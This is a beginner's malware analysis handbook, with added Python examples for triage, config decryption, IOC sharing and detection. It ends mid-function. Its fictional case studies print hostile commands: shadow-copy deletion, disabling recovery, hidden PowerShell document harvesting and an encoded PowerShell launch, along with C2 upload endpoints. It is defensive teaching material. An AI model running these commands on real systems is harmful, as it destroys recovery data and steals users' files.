Malware Analysis For Beginners by Adarsh Pandey

The Malware Analysis Handbook for Beginners provides a structured approach to understanding and analyzing malware, covering initial static analysis, dynamic analysis, code analysis, and reporting. It outlines various techniques and tools for each analysis phase, emphasizing the importance of safe practices and detailed reporting. Additionally, it includes practical examples of malware analysis, showcasing the steps to identify and mitigate threats effectively.
MALWARE ANALYSIS HANDBOOK FOR BEGINNERS

INTRODUCTION

Malware analysis is the process of studying malicious software to understand its
functionality, origin, and potential impact. This handbook provides beginners with a
structured approach to malware analysis, complete with practical examples and
techniques.

THE MALWARE ANALYSIS PROCESS

1. INITIAL ANALYSIS (STATIC ANALYSIS)

Definition: Examining malware without executing it to gather preliminary information.

Static analysis involves examining a malware sample without executing it, to understand
its structure, behavior, and intent. Analysts inspect code, strings, headers, and metadata
using tools like IDA Pro, Ghidra, or strings.exe. This technique helps identify hardcoded
IPs, domains, suspicious function calls, and file properties — all without the risk of
triggering the malware.

Why It’s Useful:

• Safe – No need to run the malware, so it's less risky.

• Quick Wins – Reveals indicators like IP addresses, domains, file paths, or
suspicious strings.

• Foundation for Deeper Analysis – Sets the stage for dynamic analysis and
behavior profiling.

Common Static Analysis Techniques:

• File Inspection: Examine headers (PE/ELF), file size, hashes (MD5/SHA256), etc.

• String Analysis: Use tools like strings, BinText, or FlareVM to extract readable text
that may reveal C2 servers, commands, or error messages.

• Disassembly: Analyze code without executing it using tools like Ghidra, IDA Pro, or
Radare2.

• PE Analysis: Use tools like PEview, CFF Explorer, or Detect It Easy (DIE) to check
import tables, sections, and compiled timestamps.

• Obfuscation Checks: Identify packing or encryption methods used to hide
malicious content.

What to Look For:

• Hardcoded IP addresses or domains

• Suspicious API calls (e.g., CreateRemoteThread, VirtualAlloc)

• Unusual section names or compressed/encrypted code

• Embedded credentials, commands, or file names

Tools:

• File hashing utilities (MD5, SHA-1, SHA-256)

• Strings utility

• PE Explorer

• ExeInfo PE

• PPEE (Puppy PE)

• VirusTotal

• PEStudio

• DIE

• IDA Free

• Ghidra
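The static checks listed above, as an added example that is not part of the handbook: it hashes a sample, extracts printable strings the way the strings utility does, verifies the PE header, and flags the indicator types the section says to look for. The binary is a constructed stand-in with DataThief-style strings, and the SUSPICIOUS_APIS list is an illustrative starting point, not a complete checklist.

```python
"""Static triage of a suspicious binary without executing it (added example)."""
import hashlib
import re

# API names the handbook singles out. Assumption: an illustrative starter list.
SUSPICIOUS_APIS = {"CreateRemoteThread", "VirtualAlloc",
                   "WriteProcessMemory", "IsDebuggerPresent"}

IPV4_RE = re.compile(rb"\b(?:\d{1,3}\.){3}\d{1,3}\b")
DOMAIN_RE = re.compile(rb"\b[a-z0-9-]+(?:\.[a-z0-9-]+)*\.(?:net|com|org|io)\b", re.I)
RUNKEY_RE = re.compile(rb"HK(?:CU|LM)\\[^\x00]*?CurrentVersion\\Run", re.I)


def build_sample() -> bytes:
    """Constructed stand-in for a dropped executable: a minimal DOS/PE header
    followed by junk bytes with a few DataThief-style strings between them."""
    header = bytearray(b"MZ" + b"\x00" * 0x3e)          # 0x40-byte DOS header
    header[0x3c:0x40] = (0x40).to_bytes(4, "little")    # e_lfanew -> PE signature
    header += b"PE\x00\x00"
    body = (b"\x01\x02This program cannot be run in DOS mode.\x00"
            b"\x7f\x7fkernel32.dll\x00CreateRemoteThread\x00VirtualAlloc\x00"
            b"\x11HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\x00"
            b"ftp.databackup-secure.net\x00192.168.1.100\x00\x01\x02\x03"
            b"GET /updates/security.dat\x00\xde\xad\xbe\xef")
    return bytes(header) + body


SAMPLE = build_sample()


def file_hashes(data: bytes) -> dict:
    """MD5 / SHA-1 / SHA-256: the first things that go into the report and VirusTotal."""
    return {name: hashlib.new(name, data).hexdigest() for name in ("md5", "sha1", "sha256")}


def extract_strings(data: bytes, min_len: int = 4) -> list:
    """Runs of printable ASCII at least min_len long, like the strings utility."""
    pattern = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    return [m.group().decode("ascii") for m in pattern.finditer(data)]


def is_pe(data: bytes) -> bool:
    """PE check: 'MZ' DOS stub and e_lfanew (offset 0x3c) pointing at 'PE\\0\\0'."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    pe_offset = int.from_bytes(data[0x3c:0x40], "little")
    return data[pe_offset:pe_offset + 4] == b"PE\x00\x00"


def triage(data: bytes) -> dict:
    """Collect the static indicators an analyst records before any execution."""
    strings = extract_strings(data)
    return {
        "hashes": file_hashes(data),
        "is_pe": is_pe(data),
        "ipv4": sorted({m.group().decode() for m in IPV4_RE.finditer(data)}),
        "domains": sorted({m.group().decode().lower() for m in DOMAIN_RE.finditer(data)}),
        "run_keys": [m.group().decode() for m in RUNKEY_RE.finditer(data)],
        "suspicious_apis": sorted(s for s in strings if s in SUSPICIOUS_APIS),
        "strings": strings,
    }


if __name__ == "__main__":
    report = triage(SAMPLE)
    for key, value in report.items():
        if key != "strings":
            print(f"{key}: {value}")
```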

2. DYNAMIC ANALYSIS (BEHAVIORAL ANALYSIS)

Definition: Running malware in a controlled environment to observe its behavior.

Dynamic analysis involves executing the malware in a controlled environment to
observe its real-time behavior. This allows analysts to uncover actions that can’t be seen in
static analysis, such as how the malware interacts with the system, network, or registry.

Why It’s Useful:

• Reveals Actual Behavior – See what the malware really does, not just what it’s
coded to do.

• Detects Evasion – Many malware variants act differently when executed (e.g.,
delaying execution, detecting sandboxes).

• Extracts IOCs (Indicators of Compromise) – Get live data like file modifications,
created processes, network traffic, etc.

Common Dynamic Analysis Activities:

• Running in a Sandbox: Use tools like Any.Run, Cuckoo Sandbox, or Joe Sandbox
to safely run the malware and record its behavior.

• Process Monitoring: Track process creation, injection, and termination using tools
like Process Monitor (ProcMon) or Process Explorer.

• Network Monitoring: Capture outgoing connections, DNS requests, or downloads
using Wireshark, Fiddler, or TCPView.

• Registry and File Monitoring: Detect changes to the system using Regshot,
ProcMon, or Filemon.

Tools:

• Cuckoo Sandbox

• ANY.RUN

• VMware/VirtualBox (isolated VMs)

• Wireshark (network analysis)

• Process Monitor/Process Explorer

• Volatility (memory analysis)


3. CODE ANALYSIS (REVERSE ENGINEERING)

Code analysis, often called reverse engineering, involves digging deep into the actual
instructions the malware executes — by disassembling or decompiling the binary. This
allows analysts to understand the inner workings, logic, and intentions of the malware.

Why It’s Useful:

• Reveals Hidden Logic – Understand what the malware is doing at a low level, even
if it's obfuscated or packed.

• Bypasses Obfuscation – Can uncover encrypted strings, hidden functions, or
custom protocols.

• Enables Signature Creation – Essential for writing YARA rules, AV signatures, or
developing patches.

• Essential for APTs and Advanced Malware – Many sophisticated threats require
reverse engineering to fully understand.

Common Code Analysis Techniques:

• Disassembly – View the raw assembly instructions (e.g., with IDA Pro, Ghidra, or
Radare2).

• Decompilation – Reconstruct higher-level code (C-like) to make logic more
readable.

• Control Flow Analysis – Trace how the program branches, loops, and calls
functions.

• String Decryption – Identify and decode hardcoded or encrypted strings.

• Debugging – Use tools like x64dbg or OllyDbg to step through code in real time and
observe behavior.

• API Call Analysis – Study interactions with system functions.

Popular Tools:

• Ghidra – Free, powerful reverse engineering suite from the NSA

• IDA Pro / IDA Free – Industry-standard disassembler

• x64dbg / OllyDbg – Interactive debuggers

• Cutter – GUI for Radare2, beginner-friendly

• Binary Ninja – Lightweight and scriptable disassembler

• dnSpy – For analyzing .NET malware

• Uncompyle6 / pyinstxtractor – For Python-based malware

• Radare2

What to Look For:

• Custom encryption or packing routines

• C2 communication logic

• Exploit code or injection techniques

• String decoding functions

• Anti-analysis and anti-debug tricks (e.g., IsDebuggerPresent(), timing checks)

Pro Tip: Code analysis is the most advanced part of malware analysis — focus on building
your assembly and debugging skills gradually.

4. REPORTING AND INTELLIGENCE

Definition: Documenting findings and sharing actionable intelligence.

Reporting and intelligence is the final but crucial stage of malware analysis. It transforms
technical findings into actionable insights for defenders, leadership, and threat intel
teams. A good report helps drive better detection, response, and long-term defense
strategies.

Why It’s Important:

• Communicates Risk Clearly – Translates technical data into business impact.

• Enables Defense Improvements – Supports writing detections, tuning SIEM rules,
or updating EDR tools.

• Feeds Threat Intelligence – Contributes to understanding attacker behavior, TTPs,
and campaigns.

Key Components of a Good Malware Report:

• Summary – High-level overview (who, what, when, impact)

• Technical Analysis – Static, dynamic, and code analysis findings

• IOCs (Indicators of Compromise) – IPs, hashes, domains, filenames, mutexes

• MITRE ATT&CK Mapping – Tactics and techniques used

• Screenshots / Logs / Graphs – Visual evidence for clarity

• Mitigation Strategies – Recommendations for detection and remediation

• Attribution Information – Potential threat actors or campaigns

• Recommendations – Containment, detection, remediation steps

Useful Tools & Platforms:

• MISP – Share and manage threat intel

• TheHive – Case management and report generation

• Jira / Confluence / Notion – Documentation platforms

• Markdown / LaTeX / Word – For formal reports

• STIX/TAXII – Standards for structured threat intelligence sharing

Where the Intel Goes:

• SIEMs and SOARs for alerting and automation

• Threat feeds and enrichment platforms

• Cyber threat intelligence teams and public reports (e.g., blogs, ISACs)

Safety Precautions

1. Isolated Environment: Always analyze malware in isolated virtual machines with
no internet access (or controlled access).

2. Snapshots: Take VM snapshots before analysis for easy rollback.

3. Host Protection: Ensure the host system has adequate protection.

4. Network Segregation: Use a separate network for analysis activities.

5. Data Handling: Treat all outputs from malware as potentially malicious.

Pro Tip: Always tailor your report to the audience — execs need a risk summary, defenders
need IOCs, and CTI teams want TTPs and context.

SETTING UP A MALWARE ANALYSIS LAB

Basic Lab Requirements:

1. Host System: Well-protected computer with adequate resources

2. Virtualization Software: VMware Workstation/Player or VirtualBox

3. Analysis VMs: Windows and Linux VMs for malware execution

4. Analysis Tools: Static, dynamic, and code analysis tools

5. Network Controls: Virtual network configurations, optional IDS/IPS

Creating Analysis VM:

1. Install a clean OS (Windows/Linux)

2. Install required analysis tools

3. Configure system for analysis (disable automatic updates, etc.)

4. Take a clean snapshot

5. Disable shared folders and other connections to host

PRACTICAL EXAMPLE: ANALYZING "DATATHIEF" MALWARE

Scenario:

A suspicious executable named "Product_invoice_details.exe" was received as an email
attachment. Users report strange system behavior after opening it.

Step 1: Initial Static Analysis

• File Name: invoice_details.exe

• Size: 256 KB

• MD5: 7a8b9c0d1e2f3a4b5c6d7e8f9a0b1c2d

• SHA-256: 8f7e6d5c4b3a291e8d7c6b5a4c3d2e1f0a9b8c7d6e5f4a3b2c1d0e9f8a7b6c5d4

• File Type: Win32 EXE

• Compiled: 2023-09-15 08:42:11

Strings Analysis Results:

Revealed suspicious artifacts:

• C:\ProgramData\system32backup\svchost.exe
• HKCU\Software\Microsoft\Windows\CurrentVersion\Run
• Connect: ftp.databackup-secure.net
• User: anonymous
• Pass: [email protected]
• GET /updates/security.dat
• PowerShell Exfiltration: powershell.exe -WindowStyle Hidden -Command "Get-Content -Path 'C:\Users\*\Documents\*.doc' | Out-File -FilePath 'C:\ProgramData\temp.dat'"

Observations:

• Attempts to disguise as a legitimate invoice file

• Potential persistence via registry

• FTP and HTTP-based C2 communication

• PowerShell used to read documents and store data locally — likely for exfiltration

Step 2: Dynamic Analysis

System Changes:

• Creates directory: C:\ProgramData\system32backup\

• Copies itself as: C:\ProgramData\system32backup\svchost.exe

• Modifies registry:
HKCU\Software\Microsoft\Windows\CurrentVersion\Run\SystemBackup

• Creates file: C:\ProgramData\temp.dat

Network Activity:

• DNS resolution for ftp.databackup-secure.net

• FTP connection attempt to 192.168.1.100:21

• HTTP GET request to http://192.168.1.100/updates/security.dat

• Data upload to http://192.168.1.100/collect.php

Process Activity:

• Spawns PowerShell process with hidden window

• Creates scheduled task "System_Maintenance" to run daily

Step 3: Code Analysis

Disassembly Findings:

• Uses Win32 API functions: CreateFile, WriteFile, RegSetValueEx

• Contains encrypted configuration section (XOR with key 0x7A)

• Employs anti-debugging techniques (IsDebuggerPresent checks)

• Includes keylogging functionality targeting browser windows

• Screenshots capture mechanism triggered every 30 seconds

Configuration Extraction (Decrypted):

{
  "c2": {
    "primary": "ftp.databackup-secure.net",
    "fallback": "192.168.1.100"
  },
  "exfil": {
    "documents": true,
    "screenshots": true,
    "keystrokes": true
  },
  "persistence": {
    "registry": true,
    "task": true
  }
}
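Recovering a single-byte XOR configuration like the one above, as an added example that is not part of the handbook: it goes beyond the page's case by trying all 256 keys and keeping the one whose output parses as a JSON object, so the key does not have to be known in advance. The encrypted blob is constructed here by XORing the decrypted config with 0x7A, the key the disassembly findings report.

```python
"""Recovering an XOR-encrypted configuration blob (added example)."""
import json
import string

# The decrypted configuration the handbook reports for DataThief.
PLAINTEXT_CONFIG = {
    "c2": {"primary": "ftp.databackup-secure.net", "fallback": "192.168.1.100"},
    "exfil": {"documents": True, "screenshots": True, "keystrokes": True},
    "persistence": {"registry": True, "task": True},
}
KEY = 0x7A  # key named in the handbook's disassembly findings


def xor_bytes(data: bytes, key: int) -> bytes:
    """Single-byte XOR is its own inverse, so one function encrypts and decrypts."""
    return bytes(b ^ key for b in data)


# Constructed sample of what the encrypted section looks like inside the binary.
ENCRYPTED_BLOB = xor_bytes(json.dumps(PLAINTEXT_CONFIG, separators=(",", ":")).encode(), KEY)


def printable_ratio(data: bytes) -> float:
    """Fraction of bytes that are printable ASCII; used to rank non-JSON candidates."""
    printable = set(string.printable.encode())
    return sum(b in printable for b in data) / max(len(data), 1)


def recover_xor_config(blob: bytes) -> tuple:
    """Try every single-byte key. Return (key, config) for the first key whose output
    is a JSON object; otherwise (most_printable_key, None) so the analyst can inspect it."""
    best_key, best_ratio = None, -1.0
    for key in range(256):
        candidate = xor_bytes(blob, key)
        try:
            obj = json.loads(candidate.decode("utf-8"))
            if isinstance(obj, dict):
                return key, obj
        except (UnicodeDecodeError, json.JSONDecodeError):
            pass
        ratio = printable_ratio(candidate)
        if ratio > best_ratio:
            best_key, best_ratio = key, ratio
    return best_key, None


def config_iocs(config: dict) -> list:
    """Network indicators from the decrypted config, ready for the IOC section of the report."""
    return sorted(v for v in config.get("c2", {}).values() if isinstance(v, str))


if __name__ == "__main__":
    key, config = recover_xor_config(ENCRYPTED_BLOB)
    print(f"key=0x{key:02x} config={config}")
    print("IOCs:", config_iocs(config))
```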

Step 4: Reporting

Malware Classification:

• Type: Information Stealer / Trojan

• Family: Likely custom or low-prevalence; no exact AV match

Capabilities Summary:

• Document Theft: via PowerShell script targeting user documents

• Keylogging: Monitors user input in browsers

• Screenshots: Periodic screen captures

• Persistence: Registry + Scheduled Task

• C2 Communication: FTP (for download/upload) and HTTP fallback

Intelligence Insights:

• Likely Goal: Data exfiltration of sensitive documents and user behavior

• Potential Attribution: Unknown; FTP with generic credentials may indicate
commodity malware or script kiddie level

MITRE ATT&CK Mapping:

o T1059.001 – PowerShell

o T1056.001 – Keylogging

o T1113 – Screen Capture

o T1053.005 – Scheduled Task

o T1105 – Ingress Tool Transfer

Recommendations:

• Isolate affected hosts

• Block IOC domains/IPs at firewall/proxy

• Hunt for registry key and dropped files

• Reimage affected endpoints

• Update detection rules for FTP use and unusual PowerShell patterns

INDICATORS OF COMPROMISE (IOCS):

• File Hash: 8f7e6d5c4b3a291e8d7c6b5a4c3d2e1f0a9b8c7d6e5f4a3b2c1d0e9f8a7b6c5d4

• Domain: ftp.databackup-secure.net

• IP Address: 192.168.1.100

• Registry Key: HKCU\Software\Microsoft\Windows\CurrentVersion\Run\SystemBackup

• File Path: C:\ProgramData\system32backup\svchost.exe

• Scheduled Task: System_Maintenance (Runs daily)

Mitigation Recommendations:

1. Block communication to identified domains and IPs

2. Remove registry persistence keys

3. Delete malicious files and scheduled tasks

4. Scan system for additional compromises

5. Update security software with identified IOCs
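Sharing the DataThief IOCs above in the STIX 2.1 format that the reporting section names, as an added example that is not part of the handbook: it builds indicator objects as plain dictionaries (no stix2 library needed) and runs a few sanity checks before upload. The registry hive is spelled out as HKEY_CURRENT_USER because STIX patterns expect the full hive name; the indicator names are assumptions.

```python
"""Packaging the DataThief IOCs as a STIX 2.1 bundle (added example)."""
import json
import uuid
from datetime import datetime, timezone

# IOCs from the DataThief report. STIX spells out the hive, so HKCU becomes HKEY_CURRENT_USER.
DATATHIEF_IOCS = {
    "sha256": "8f7e6d5c4b3a291e8d7c6b5a4c3d2e1f0a9b8c7d6e5f4a3b2c1d0e9f8a7b6c5d4",
    "domain": "ftp.databackup-secure.net",
    "ipv4": "192.168.1.100",
    "registry_key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\SystemBackup",
    "file_dir": "C:\\ProgramData\\system32backup",
    "file_name": "svchost.exe",
}


def stix_str(value: str) -> str:
    """Quote a value for a STIX pattern: backslashes and single quotes are escaped with a backslash."""
    return "'" + value.replace("\\", "\\\\").replace("'", "\\'") + "'"


def build_patterns(iocs: dict) -> list:
    """(name, pattern) pairs; each pattern is one STIX comparison expression in [ ]."""
    return [
        ("DataThief dropper SHA-256", f"[file:hashes.'SHA-256' = {stix_str(iocs['sha256'])}]"),
        ("DataThief C2 domain", f"[domain-name:value = {stix_str(iocs['domain'])}]"),
        ("DataThief fallback C2 IP", f"[ipv4-addr:value = {stix_str(iocs['ipv4'])}]"),
        ("DataThief Run key persistence",
         f"[windows-registry-key:key = {stix_str(iocs['registry_key'])}]"),
        ("DataThief dropped copy",
         f"[file:name = {stix_str(iocs['file_name'])} AND "
         f"file:parent_directory_ref.path = {stix_str(iocs['file_dir'])}]"),
    ]


def make_indicator(name: str, pattern: str, created: str) -> dict:
    """A STIX 2.1 Indicator SDO with the required properties filled in."""
    return {
        "type": "indicator",
        "spec_version": "2.1",
        "id": f"indicator--{uuid.uuid4()}",
        "created": created,
        "modified": created,
        "name": name,
        "indicator_types": ["malicious-activity"],
        "pattern": pattern,
        "pattern_type": "stix",
        "valid_from": created,
    }


def build_bundle(iocs: dict) -> dict:
    now = datetime.now(timezone.utc).strftime("%Y-%m-%dT%H:%M:%S.000Z")
    return {"type": "bundle", "id": f"bundle--{uuid.uuid4()}",
            "objects": [make_indicator(n, p, now) for n, p in build_patterns(iocs)]}


def check_bundle(bundle: dict) -> list:
    """Cheap sanity checks before pushing to MISP/TAXII: id prefix matches type,
    required fields present, pattern bracketed. Returns a list of problems."""
    problems = []
    for obj in bundle["objects"]:
        if not obj["id"].startswith(obj["type"] + "--"):
            problems.append(f"{obj['id']}: id prefix does not match type")
        for field in ("created", "modified", "pattern", "pattern_type", "valid_from"):
            if field not in obj:
                problems.append(f"{obj['id']}: missing {field}")
        pattern = obj.get("pattern", "")
        if not (pattern.startswith("[") and pattern.endswith("]")):
            problems.append(f"{obj['id']}: pattern is not bracketed")
    return problems


def to_json(bundle: dict) -> str:
    return json.dumps(bundle, indent=2)


if __name__ == "__main__":
    bundle = build_bundle(DATATHIEF_IOCS)
    print(to_json(bundle))
    print("problems:", check_bundle(bundle))
```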

ADVANCED ANALYSIS EXAMPLE: "RANSOMLOCK" RANSOMWARE

Initial Analysis

File Properties:

File Name: security_update1.exe

Size: 512 KB

SHA-256: 2a1b3c4d5e6f7a8b9c0d1e2f3a4b5c6d7e8f9a0b1c2d3e4f5a6b7c8d9e0f1a2b

Timestamp: 2023-10-27

Strings Analysis (Partial):

.rsm

Your files have been encrypted!

Bitcoin address: bc1q9h7j8k5l6m7n8p9q0r1s2t3u4v5w6x7y8z9a

Contact: [email protected]
AES-256-CBC

CreateEncryptionKey

FindFirstFile

CryptEncrypt

Packer Detection:

• UPX packing detected

• Custom obfuscation layer present

DYNAMIC ANALYSIS

Behavioral Findings:

• Deletes Volume Shadow Copies: vssadmin delete shadows /all /quiet

• Disables Windows recovery mode: bcdedit /set recoveryenabled No

• Drops ransom note as "RECOVERY.txt" on desktop

• Encrypts files with extensions: .doc, .pdf, .jpg, .xls, etc.

• Adds ".rsm" extension to encrypted files

Network Activity:

• Connects to TOR network via embedded TOR client

• Communicates with .onion address: r2d2c3p0.onion

• Sends system information and encryption key data

Registry Modifications:

• Adds startup entry for persistence

• Modifies Windows Defender exclusions

• Disables task manager via registry


CODE ANALYSIS

Encryption Mechanism:

// Pseudocode of encryption routine
function EncryptFile(filePath) {
    randomKey = GenerateRandomAESKey(32); // 256 bits, fresh key per file
    encryptedFile = AES_CBC_Encrypt(ReadFile(filePath), randomKey);
    publicKey = ReadEmbeddedRSAPublicKey();
    // Only the holder of the matching private key can recover randomKey
    encryptedKey = RSA_Encrypt(randomKey, publicKey);
    WriteFile(filePath + ".rsm", encryptedFile + encryptedKey);
    DeleteFile(filePath);
}

Anti-Analysis Techniques:

• Timing checks for sandbox detection

• VM detection via registry checks

• Sleep calls between operations

• Process injection for persistence

REPORTING

Classification: Ransomware with data destruction capabilities

Technical Summary: RansomLock employs a hybrid encryption scheme using AES-256 for
file encryption and RSA for key protection. It destroys recovery mechanisms and
establishes communication through TOR. The malware performs basic system
reconnaissance before encryption and targets multiple file types.

IOCs:

• File Hash:
2a1b3c4d5e6f7a8b9c0d1e2f3a4b5c6d7e8f9a0b1c2d3e4f5a6b7c8d9e0f1a2b

• Bitcoin Address: bc1q9h7j8k5l6m7n8p9q0r1s2t3u4v5w6x7y8z9a

• TOR Address: r2d2c3p0.onion

• Email: [email protected]

• File Marker: .rsm extension

Recovery Options:

1. Restore from clean backups (recommended)

2. Check for decryptors from security researchers

3. Paying the ransom is NOT recommended
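Detection logic for the RansomLock behaviors listed in the dynamic analysis, as an added example that is not part of the handbook: it runs over constructed Sysmon-style process-creation and file-rename events and flags shadow-copy deletion, disabling of Windows recovery, and a burst of renames to the .rsm extension. The event field names are an assumption modelled on Sysmon; T1490 (Inhibit System Recovery) and T1486 (Data Encrypted for Impact) are the ATT&CK techniques these map to.

```python
"""Detecting RansomLock-style behaviour from endpoint telemetry (added example)."""
import re
from collections import defaultdict

# Constructed telemetry: what a sensor might record in the first seconds of execution.
EVENTS = [
    {"ts": 100.0, "type": "process", "image": "C:\\Windows\\System32\\vssadmin.exe",
     "cmdline": "vssadmin delete shadows /all /quiet", "parent": "security_update1.exe"},
    {"ts": 100.5, "type": "process", "image": "C:\\Windows\\System32\\bcdedit.exe",
     "cmdline": "bcdedit /set recoveryenabled No", "parent": "security_update1.exe"},
    {"ts": 101.0, "type": "process", "image": "C:\\Windows\\System32\\notepad.exe",
     "cmdline": "notepad.exe C:\\Users\\Admin\\report.txt", "parent": "explorer.exe"},
] + [
    {"ts": 102.0 + i * 0.1, "type": "rename", "process": "security_update1.exe",
     "old": f"C:\\Users\\Admin\\Documents\\file{i}.doc",
     "new": f"C:\\Users\\Admin\\Documents\\file{i}.doc.rsm"}
    for i in range(25)
]

# Rules: (name, ATT&CK technique, regex over the command line).
PROCESS_RULES = [
    ("shadow_copy_deletion", "T1490",
     re.compile(r"vssadmin(?:\.exe)?\s+delete\s+shadows", re.I)),
    ("recovery_disabled", "T1490",
     re.compile(r"bcdedit(?:\.exe)?\s+/set\s+recoveryenabled\s+no", re.I)),
]
RANSOM_EXTENSION = ".rsm"
RENAME_THRESHOLD = 20      # renames by one process ...
RENAME_WINDOW = 10.0       # ... within this many seconds


def match_process_rules(events: list) -> list:
    """Return (rule, technique, parent, cmdline) for every process event that hits a rule."""
    hits = []
    for ev in events:
        if ev.get("type") != "process":
            continue
        for name, technique, pattern in PROCESS_RULES:
            if pattern.search(ev["cmdline"]):
                hits.append((name, technique, ev["parent"], ev["cmdline"]))
    return hits


def detect_mass_rename(events: list, ext: str = RANSOM_EXTENSION) -> list:
    """Flag processes renaming >= RENAME_THRESHOLD files to `ext` inside a sliding window."""
    per_process = defaultdict(list)
    for ev in events:
        if ev.get("type") == "rename" and ev["new"].lower().endswith(ext):
            per_process[ev["process"]].append(ev["ts"])
    flagged = []
    for proc, stamps in per_process.items():
        stamps.sort()
        start = 0
        for end in range(len(stamps)):
            while stamps[end] - stamps[start] > RENAME_WINDOW:
                start += 1
            if end - start + 1 >= RENAME_THRESHOLD:
                flagged.append((proc, "T1486", end - start + 1))
                break
    return flagged


def analyse(events: list) -> dict:
    return {"process_hits": match_process_rules(events),
            "mass_rename": detect_mass_rename(events)}


if __name__ == "__main__":
    for section, findings in analyse(EVENTS).items():
        print(section, findings)
```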

USING CUCKOO SANDBOX FOR MALWARE ANALYSIS

Cuckoo Sandbox is an automated malware analysis system that provides detailed reports
on malware behavior.

Basic Workflow:

1. Submit Sample:

   cuckoo submit /path/to/suspicious_file.exe

2. View Results:

   cuckoo web

3. Analyze Report:

o Process tree

o File operations

o Registry modifications

o Network activity

o API call sequences

Example Cuckoo Report (BankingTrojan):

{
  "behavior": {
    "processes": [
      {
        "process_name": "suspicious_file.exe",
        "pid": 1234,
        "children": [
          {
            "process_name": "cmd.exe",
            "command_line": "cmd.exe /c powershell.exe -e JABkAGEAdABhAD0ARQB..."
          }
        ]
      }
    ],
    "files": [
      {
        "path": "C:\\Users\\Admin\\AppData\\Roaming\\svchost.exe",
        "action": "created"
      }
    ],
    "registry": [
      {
        "key": "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\SystemService",
        "value": "C:\\Users\\Admin\\AppData\\Roaming\\svchost.exe",
        "action": "set"
      }
    ],
    "network": {
      "http": [
        {
          "host": "banking-update-server.com",
          "uri": "/config.php",
          "method": "POST",
          "data": "id=VICTIM-PC&os=Windows+10"
        }
      ],
      "dns": [
        {
          "request": "banking-update-server.com",
          "answers": [
            {
              "type": "A",
              "data": "45.77.123.45"
            }
          ]
        }
      ]
    }
  }
}

MALWARE BEHAVIOR ANALYSIS REPORT

Summary:

A suspicious binary (suspicious_file.exe) was observed performing malicious actions
including encoded PowerShell execution, file creation for persistence, and network
communication with a Command & Control (C2) server. This behavior suggests an attempt
to establish long-term access and exfiltrate system metadata.

Detailed Behavioral Analysis

1. Process Activity

• Parent Process:

o Name: suspicious_file.exe

o PID: 1234

• Child Process:

o Name: cmd.exe

o Command Line: cmd.exe /c powershell.exe -e JABkAGEAdABhAD0ARQB...

▪ Executes PowerShell with Base64-encoded payload (typical
obfuscation method).

▪ Suggests malicious scripting to download or execute further
payloads in memory.

Interpretation: The attacker uses command-line obfuscation to bypass AV/EDR detection
and execute PowerShell stealthily.

2. File System Activity

• File Created:
o Path: C:\Users\Admin\AppData\Roaming\svchost.exe

o Action: created

Interpretation: A malicious executable is dropped in a user-accessible directory but
masquerades as a trusted Windows binary (svchost.exe) to avoid suspicion and blend into
the environment.

3. Registry Modification

• Registry Key Set:

o Path:
HKCU\Software\Microsoft\Windows\CurrentVersion\Run\SystemService

o Value: C:\Users\Admin\AppData\Roaming\svchost.exe

Interpretation: The malware achieves persistence by setting a Run key in the registry. This
ensures execution on every user logon, a common tactic used by commodity malware.

4. Network Activity

• DNS Request:

o Domain: banking-update-server.com

o Resolved IP: 45.77.123.45

• HTTP Communication:

o Method: POST

o Host: banking-update-server.com

o URI: /config.php

o Payload: id=VICTIM-PC&os=Windows+10

Interpretation:

• Malware contacts a remote C2 server, likely to report initial infection.

• Sends basic reconnaissance data (hostname + OS version) — often used for
profiling the victim or staging future payloads.

• The .php endpoint implies possible interaction with a C2 panel or backend for
attacker control.

ANALYST SUMMARY

Malware Classification:

• Type: Trojan / Initial Access Payload

• TTPs Observed:

o T1059.001 – PowerShell Execution

o T1547.001 – Registry Run Key Persistence

o T1105 – Ingress Tool Transfer

o T1071.001 – Web-based C2 Communication

Recommendations:

• Isolate affected host(s) immediately

• Block the domain banking-update-server.com and IP 45.77.123.45 at firewall and
proxy

• Hunt for registry persistence key and dropped executable

• Reset user credentials if suspicious access is suspected

• Reimage system or remove persistence mechanisms and dropped binaries
manually

• Add detection rules for:

o PowerShell base64 encoding

o Suspicious file creation in Roaming

o Outbound POST to suspicious PHP URIs
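Turning a Cuckoo-style report into IOCs and the three detections recommended above, as an added example that is not part of the handbook or of Cuckoo: it walks the report structure (processes, files, registry, network), decodes the base64/UTF-16LE form that PowerShell -EncodedCommand uses, and applies the rules for encoded PowerShell, executables dropped under Roaming, and POSTs to PHP endpoints. The report below is constructed to mirror the example report; because the page's encoded command is truncated, a harmless Write-Host command stands in for it.

```python
"""IOC extraction and detection over a Cuckoo-style behavior report (added example)."""
import base64
import re

# Harmless stand-in for the truncated encoded command in the report above.
ENCODED_CMD = base64.b64encode("Write-Host 'constructed sample'".encode("utf-16-le")).decode()

# Constructed report mirroring the handbook's BankingTrojan example.
REPORT = {
    "behavior": {
        "processes": [{
            "process_name": "suspicious_file.exe", "pid": 1234,
            "children": [{"process_name": "cmd.exe",
                          "command_line": f"cmd.exe /c powershell.exe -e {ENCODED_CMD}"}],
        }],
        "files": [{"path": "C:\\Users\\Admin\\AppData\\Roaming\\svchost.exe",
                   "action": "created"}],
        "registry": [{"key": "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\SystemService",
                      "value": "C:\\Users\\Admin\\AppData\\Roaming\\svchost.exe",
                      "action": "set"}],
        "network": {
            "http": [{"host": "banking-update-server.com", "uri": "/config.php",
                      "method": "POST", "data": "id=VICTIM-PC&os=Windows+10"}],
            "dns": [{"request": "banking-update-server.com",
                     "answers": [{"type": "A", "data": "45.77.123.45"}]}],
        },
    }
}

ENCODED_PS_RE = re.compile(
    r"powershell(?:\.exe)?\s+.*?-(?:e|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)


def decode_powershell(command_line: str):
    """PowerShell -EncodedCommand carries base64 of a UTF-16LE string; return it decoded."""
    m = ENCODED_PS_RE.search(command_line)
    if not m:
        return None
    return base64.b64decode(m.group(1)).decode("utf-16-le")


def walk_processes(procs: list):
    """Flatten the process tree, yielding every process dict (parents first)."""
    for p in procs:
        yield p
        yield from walk_processes(p.get("children", []))


def extract_iocs(report: dict) -> dict:
    """Pull the host and network indicators the analyst summary lists out of the report."""
    b = report["behavior"]
    net = b.get("network", {})
    return {
        "files": [f["path"] for f in b.get("files", []) if f.get("action") == "created"],
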